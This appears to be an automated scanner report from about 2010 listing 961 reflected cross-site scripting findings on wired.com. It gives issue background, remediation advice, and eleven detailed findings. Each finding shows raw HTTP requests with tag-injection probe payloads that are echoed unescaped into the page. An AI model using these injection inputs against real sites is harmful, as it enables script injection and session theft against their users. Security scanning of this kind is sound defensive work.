1.872. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 2]

1.873. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 3]

1.874. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 2]

1.875. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 3]

1.876. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 2]

1.877. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 3]

1.878. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 2]

1.879. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 3]

1.880. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 2]

1.881. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 3]

1.882. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 2]

1.883. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 3]

1.884. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 2]

1.885. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 3]

1.886. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 2]

1.887. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 3]

1.888. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 2]

1.889. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 3]

1.890. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 2]

1.891. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 3]

1.892. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 2]

1.893. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 3]

1.894. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 2]

1.895. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 3]

1.896. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 2]

1.897. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 3]

1.898. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 2]

1.899. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 3]

1.900. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 2]

1.901. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 3]

1.902. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 2]

1.903. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 3]

1.904. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 2]

1.905. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 3]

1.906. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 2]

1.907. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 3]

1.908. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 2]

1.909. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 3]

1.910. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 2]

1.911. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 3]

1.912. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 2]

1.913. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 3]

1.914. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 2]

1.915. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 3]

1.916. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 2]

1.917. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 3]

1.918. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 2]

1.919. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 3]

1.920. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 2]

1.921. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 3]

1.922. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 2]

1.923. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 3]

1.924. http://www.wired.com/wired/issue/16-06 [REST URL parameter 2]

1.925. http://www.wired.com/wired/issue/16-06 [REST URL parameter 3]

1.926. http://www.wired.com/wired/issue/16-07 [REST URL parameter 2]

1.927. http://www.wired.com/wired/issue/16-07 [REST URL parameter 3]

1.928. http://www.wired.com/wired/issue/16-08 [REST URL parameter 2]

1.929. http://www.wired.com/wired/issue/16-08 [REST URL parameter 3]

1.930. http://www.wired.com/wired/issue/16-09 [REST URL parameter 2]

1.931. http://www.wired.com/wired/issue/16-09 [REST URL parameter 3]

1.932. http://www.wired.com/wired/issue/16-10 [REST URL parameter 2]

1.933. http://www.wired.com/wired/issue/16-10 [REST URL parameter 3]

1.934. http://www.wired.com/wired/issue/16-11 [REST URL parameter 2]

1.935. http://www.wired.com/wired/issue/16-11 [REST URL parameter 3]

1.936. http://www.wired.com/wired/issue/16-12 [REST URL parameter 2]

1.937. http://www.wired.com/wired/issue/16-12 [REST URL parameter 3]

1.938. http://www.wired.com/wired/issue/17-01 [REST URL parameter 2]

1.939. http://www.wired.com/wired/issue/17-01 [REST URL parameter 3]

1.940. http://www.wired.com/wired/issue/17-02 [REST URL parameter 2]

1.941. http://www.wired.com/wired/issue/17-02 [REST URL parameter 3]

1.942. http://www.wired.com/wired/issue/17-03 [REST URL parameter 2]

1.943. http://www.wired.com/wired/issue/17-03 [REST URL parameter 3]

1.944. http://www.wired.com/wired/issue/17-04 [REST URL parameter 2]

1.945. http://www.wired.com/wired/issue/17-04 [REST URL parameter 3]

1.946. http://www.wired.com/wired/issue/17-05 [REST URL parameter 2]

1.947. http://www.wired.com/wired/issue/17-05 [REST URL parameter 3]

1.948. http://www.wired.com/wired/issue/17-06 [REST URL parameter 2]

1.949. http://www.wired.com/wired/issue/17-06 [REST URL parameter 3]

1.950. http://www.wired.com/wired/issue/17-07 [REST URL parameter 2]

1.951. http://www.wired.com/wired/issue/17-07 [REST URL parameter 3]

1.952. http://www.wired.com/wired/issue/17-08 [REST URL parameter 2]

1.953. http://www.wired.com/wired/issue/17-08 [REST URL parameter 3]

1.954. http://www.wired.com/wired/issue/17-09 [REST URL parameter 2]

1.955. http://www.wired.com/wired/issue/17-09 [REST URL parameter 3]

1.956. http://www.wired.com/wired/issue/17-10 [REST URL parameter 2]

1.957. http://www.wired.com/wired/issue/17-10 [REST URL parameter 3]

1.958. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 2]

1.959. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 3]

1.960. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 2]

1.961. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 3]



1. Cross-site scripting (reflected)
There are 961 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain, and input which fails the validation should be rejected, not sanitised; and user input should be HTML-encoded at any point where it is copied into application responses, replacing all HTML metacharacters, including < > " ' and =, with the corresponding HTML entities.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:13:57 GMT
Date: Mon, 22 Nov 2010 01:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related">
...[SNIP]...

1.2. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:29 GMT
Date: Mon, 22 Nov 2010 01:10:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related">
...[SNIP]...

1.3. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:05 GMT
Date: Mon, 22 Nov 2010 01:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b">
...[SNIP]...

1.4. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related">
...[SNIP]...

1.5. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related">
...[SNIP]...

1.6. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:11 GMT
Date: Mon, 22 Nov 2010 01:11:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468">
...[SNIP]...

1.7. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related">
...[SNIP]...

1.8. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:44 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4be84"><a>0968336159a c_related">
...[SNIP]...

1.9. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2">
...[SNIP]...

1.10. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:22 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related">
...[SNIP]...

1.11. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:55 GMT
Date: Mon, 22 Nov 2010 01:10:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related">
...[SNIP]...

